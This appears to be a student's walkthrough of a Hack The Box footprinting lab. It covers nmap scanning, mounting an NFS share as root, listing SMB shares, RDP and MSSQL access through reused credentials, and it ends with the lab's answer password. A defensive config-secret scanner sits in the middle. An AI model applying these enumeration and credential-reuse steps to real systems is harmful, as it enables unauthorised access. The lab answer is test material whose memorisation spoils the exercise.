Footprinting Lab Medium
Given: username HTB
Find the password for HTB.
Nmap
nmap -p- --min-rate=1000 -sV 10.129.72.67
Nmap scan report for 10.129.72.67
Host is up (0.073s latency).
Not shown: 65519 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
111/tcp open rpcbind 2-4 (RPC #100000)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open nlockmgr 1-4 (RPC #100021)
3389/tcp open ms-wbt-server Microsoft Terminal Services
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
49681/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.43 seconds
Do a script scan on RDP 3389 (rdp script scan).
Do another general aggressive nmap scan (nmap aggressive scan).
Identified services:
- SMB on 445/139
- NFS on 111/2049
- WinRM on 5985
- WMI on 135
- RDP on 3389
NFS
#NFS
Start with NFS (nfs script scan). Try to mount.
> showmount -e 10.129.72.67
Export list for 10.129.72.67:
/TechSupport (everyone)
We see TechSupport available.
> mkdir target-NFS
> sudo mount -t nfs 10.129.72.67:/ ./target-NFS/ -o nolock
I don't have permission to check inside TechSupport
> cd TechSupport
bash: cd: TechSupport: Permission denied
!! Hint used at this step !!
I'm fucking root. I get to see whatever the fuck I want.
> sudo su
> cd TechSupport
> ls -la
-rwx------ 1 nobody nogroup 0 Nov 10 2021 ticket4238791283778.txt
-rwx------ 1 nobody nogroup 0 Nov 10 2021 ticket4238791283779.txt
-rwx------ 1 nobody nogroup 0 Nov 10 2021 ticket4238791283780.txt
-rwx------ 1 nobody nogroup 0 Nov 10 2021 ticket4238791283781.txt
-rwx------ 1 nobody nogroup 1305 Nov 10 2021 ticket4238791283782.txt
-rwx------ 1 nobody nogroup 0 Nov 10 2021 ticket4238791283783.txt
-rwx------ 1 nobody nogroup 0 Nov 10 2021 ticket4238791283784.txt
Saw an interesting file. Read it.
> cat ticket4238791283782.txt
Conversation with InlaneFreight Ltd
Started on November 10, 2021 at 01:27 PM London time GMT (GMT+0200)
---
01:27 PM | Operator: Hello,.
So what brings you here today?
01:27 PM | alex: hello
01:27 PM | Operator: Hey alex!
01:27 PM | Operator: What do you need help with?
01:36 PM | alex: I run into an issue with the web config file on the system for the smtp server. do you mind to take a look at the config?
01:38 PM | Operator: Of course
01:42 PM | alex: here it is:
smtp {
  host=smtp.web.dev.inlanefreight.htb
  #port=25
  ssl=true
  user="alex"
  password="lol123!mD"
  from="alex.g@web.dev.inlanefreight.htb"
}

securesocial {

  onLoginGoTo=/
  onLogoutGoTo=/login
  ssl=false

  userpass {
    withUserNameSupport=false
    sendWelcomeEmail=true
    enableGravatarSupport=true
    signupSkipLogin=true
    tokenDuration=60
    tokenDeleteInterval=5
    minimumPasswordLength=8
    enableTokenJob=true
    hasher=bcrypt
  }

  cookie {
    # name=id
    # path=/login
    # domain="10.129.2.59:9500"
    httpOnly=true
    makeTransient=false
    absoluteTimeoutInMinutes=1440
    idleTimeoutInMinutes=1440
  }
---
Got credentials alex:lol123!mD
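The leak here is a plaintext SMTP password sitting in an application config that then got pasted into a support ticket on a world-readable share. A quick way to catch that class of problem before a config leaves the box: a scanner that walks the HOCON-style blocks above and reports credential-bearing keys and disabled security settings. This is an added example, not part of the lab or the write-up; the key list and the trimmed sample config are my own.

```python
import re
# Constructed sample: a trimmed copy of the config pasted into the support ticket above.
CONFIG = """\
smtp {
  host=smtp.web.dev.inlanefreight.htb
  #port=25
  ssl=true
  user="alex"
  password="lol123!mD"
}
securesocial {
  ssl=false
  userpass {
    tokenDuration=60
    hasher=bcrypt
  }
  cookie {
    # domain="10.129.2.59:9500"
    httpOnly=true
  }
}
"""
# Keys that hold a credential when set; anchored at the end so tokenDuration is not flagged.
SECRET_KEY = re.compile(r"(password|passwd|secret|token|api[_-]?key)$", re.I)
KV = re.compile(r"^(\w+)\s*=\s*(.*)$")

def scan_config(text):
    """Walk a HOCON-style config; return (dotted.key, issue, masked value) findings."""
    stack, findings = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):   # blank or commented out: ignore
            continue
        if line.endswith("{"):                 # enter a block such as "smtp {"
            stack.append(line[:-1].strip())
            continue
        if line == "}":
            stack.pop()
            continue
        m = KV.match(line)
        if not m:
            continue
        key, value = m.group(1), m.group(2).strip().strip('"')
        path = ".".join(stack + [key])
        if SECRET_KEY.search(key) and value:
            findings.append((path, "hard-coded credential", value[:2] + "*" * (len(value) - 2)))
        elif key in ("ssl", "httpOnly") and value.lower() == "false":
            findings.append((path, key + " disabled", value))
    return findings
```

Masking the reported value lets the finding go into a ticket or log without re-leaking the secret it found.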
SMB
#SMB
Try connecting using HTB:
> smbclient -L //10.129.143.191 -U HTB
Password for [WORKGROUP\HTB]:
session setup failed: NT_STATUS_LOGON_FAILURE
Try connecting with a null session:
> rpcclient -U "" 10.129.143.191
Password for [WORKGROUP\]:
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE
Try connecting with alex:
> smbclient -L //10.129.143.191 -U alex
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
devshare Disk
IPC$ IPC Remote IPC
Users Disk
Connect to devshare:
> smbclient //10.129.143.191/devshare -U alex
Password for [WORKGROUP\alex]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Nov 10 10:12:22 2021
.. D 0 Wed Nov 10 10:12:22 2021
important.txt A 16 Wed Nov 10 10:12:55 2021
6367231 blocks of size 4096. 2592459 blocks available
smb: \> get important.txt
getting file \important.txt of size 16 as important.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \> quit
> cat important.txt
sa:87N1ns@slls83
It seems like I got another set of credentials:
sa:87N1ns@slls83
Connect to the Users share:
> smbclient //10.129.143.191/users -U alex
Password for [WORKGROUP\alex]:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Wed Nov 10 18:25:55 2021
.. DR 0 Wed Nov 10 18:25:55 2021
alex D 0 Wed Nov 10 18:25:55 2021
Default DHR 0 Tue Dec 15 04:32:11 2020
desktop.ini AHS 174 Sat Sep 15 02:16:48 2018
6367231 blocks of size 4096. 2592458 blocks available
smb: \> cd alex
smb: \alex\> ls
. D 0 Wed Nov 10 18:25:55 2021
.. D 0 Wed Nov 10 18:25:55 2021
3D Objects DR 0 Wed Nov 10 08:19:25 2021
AppData DH 0 Wed Nov 10 08:19:22 2021
Contacts DR 0 Wed Nov 10 08:19:25 2021
Desktop DR 0 Wed Nov 10 17:34:44 2021
devshare D 0 Wed Nov 10 10:12:22 2021
Documents DR 0 Wed Nov 10 18:25:27 2021
Downloads DR 0 Wed Nov 10 08:19:25 2021
Favorites DR 0 Wed Nov 10 08:19:25 2021
Links DR 0 Wed Nov 10 08:19:26 2021
Music DR 0 Wed Nov 10 08:19:25 2021
NTUSER.DAT AHn 3670016 Sun Nov 24 02:14:59 2024
ntuser.dat.LOG1 AHS 12288 Wed Nov 10 08:19:21 2021
ntuser.dat.LOG2 AHS 458752 Wed Nov 10 08:19:21 2021
NTUSER.DAT{1c3790b4-b8ad-11e8-aa21-e41d2d101530}.TM.blf AHS 65536 Wed Nov 10 08:20:10 2021
NTUSER.DAT{1c3790b4-b8ad-11e8-aa21-e41d2d101530}.TMContainer00000000000000000001.regtrans-ms AHS 524288 Wed Nov 10 08:19:21 2021
NTUSER.DAT{1c3790b4-b8ad-11e8-aa21-e41d2d101530}.TMContainer00000000000000000002.regtrans-ms AHS 524288 Wed Nov 10 08:19:21 2021
ntuser.ini HS 20 Wed Nov 10 08:19:22 2021
Pictures DR 0 Wed Nov 10 08:19:25 2021
Saved Games DR 0 Wed Nov 10 08:19:26 2021
Searches DR 0 Wed Nov 10 08:19:26 2021
TechSupport D 0 Sun Nov 24 01:10:49 2024
Videos DR 0 Wed Nov 10 08:19:25 2021
6367231 blocks of size 4096. 2592458 blocks available
Did not find anything interesting.
WinRM
Tried to log in with credentials alex:lol123!mD and sa:87N1ns@slls83.
evil-winrm -i 10.129.143.191 -u sa -p 87N1ns@slls83
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
Neither worked.
RDP
#RDP
For the love of my life I can't fucking figure out what is wrong with the pwnbox. It did not let me connect through xfreerdp. Instead, I had to use Remmina.
> sudo apt update && sudo apt install remmina remmina-plugin-rdp -y
> remmina
Credentials sa:87N1ns@slls83 did not work.
I logged in with credentials alex:lol123!mD.
There's a Microsoft SQL Studio app. When I click into it, the login username is already filled with sa, so I used sa's password.
Surprisingly, I cannot log in.
I looked up the walkthrough and it says it's password reuse. Admin is also using this password. What the fuck.
#credential_stuffing
Left click on the app and select "Run as administrator". Input sa's password.
Then we could connect to the database.
MSSQL. Select all tables:
#mssql
SELECT TABLE_NAME
FROM INFORMATION_SCHEMA.TABLES
WHERE TABLE_TYPE = 'BASE TABLE';
Output: devsacc
SELECT *
FROM devsacc
A list of names and passwords. String literals in T-SQL take single quotes (double quotes denote an identifier under the default QUOTED_IDENTIFIER setting):
SELECT *
FROM devsacc
WHERE name LIKE '%HTB%';
id name Password
157 HTB lnch7ehrdn43i7AoqVPK4zWR